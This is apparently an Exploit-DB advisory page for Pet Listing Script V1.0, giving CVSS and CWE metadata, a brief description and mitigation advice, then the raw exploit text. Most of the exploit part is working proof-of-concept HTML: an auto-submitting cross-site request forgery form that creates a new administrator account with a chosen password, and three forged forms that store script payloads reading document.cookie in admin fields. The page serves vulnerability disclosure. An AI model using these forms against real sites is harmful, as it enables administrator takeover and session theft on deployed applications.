Pet Listing Script V1.0 - Multiple Vulnerabilities

vendor:

Pet Listing Script

by:

HackXBack

8,8

CVSS

HIGH

Cross Site Request Forgery, Multiple Cross Site Scripting

352, 79

CWE

Product Name: Pet Listing Script

Affected Version From: V1.0

Affected Version To: V1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:phpjabbers:pet_listing_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Pet Listing Script V1.0 – Multiple Vulnerabilities

The Pet Listing Script V1.0 is vulnerable to Cross Site Request Forgery and Multiple Cross Site Scripting. An attacker can exploit this vulnerability by sending a malicious request to the server with a crafted HTML form containing hidden input fields. The attacker can also exploit the vulnerability by sending a malicious request with a crafted HTML form containing a script tag with malicious JavaScript code. This can be used to steal the user's cookies and gain access to the application.

Mitigation:

The application should use a secure random token to verify the authenticity of the request. The application should also validate all user input and sanitize it before displaying it to the user.

Source

Exploit-DB raw data:

Pet Listing Script V1.0 - Multiple Vulnerabilities
====================================================================

####################################################################
.:. Author         : HackXBack
.:. Contact        : h-b@usa.com
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.phpjabbers.com/pet-listing-script/
####################################################################

===[ Exploit ]===

[1] Cross Site Request Forgery
==============================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminUsers&action=create">
<input type="hidden" name="user_create" value="1"/>
<input type="hidden" name="role_id" value="1"/>
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="Password"/>
<input type="hidden" name="status" value="T"/>
</form>
</body>
</html>

[2] Multiple Cross Site Scripting
==================================

# CSRF with XSS Exploit:

I. Xss In Type

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminTypes&action=create">
<input type="hidden" name="type_create" value="1"/>
<input type="hidden" name="type_title"
value="<script>alert(document.cookie);</script>"/>
</form>
</body>
</html>

II. Xss In Breed

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminBreeds&action=create">
<input type="hidden" name="breed_create" value="1"/>
<input type="hidden" name="breed_title"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="type_id" value="2"/>
</form>
</body>
</html>

III. Xss In Extra

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminExtras&action=create">
<input type="hidden" name="extra_create" value="1"/>
<input type="hidden" name="extra_title"
value="<script>alert(document.cookie);</script>"/>
</form>
</body>
</html>
####################################################################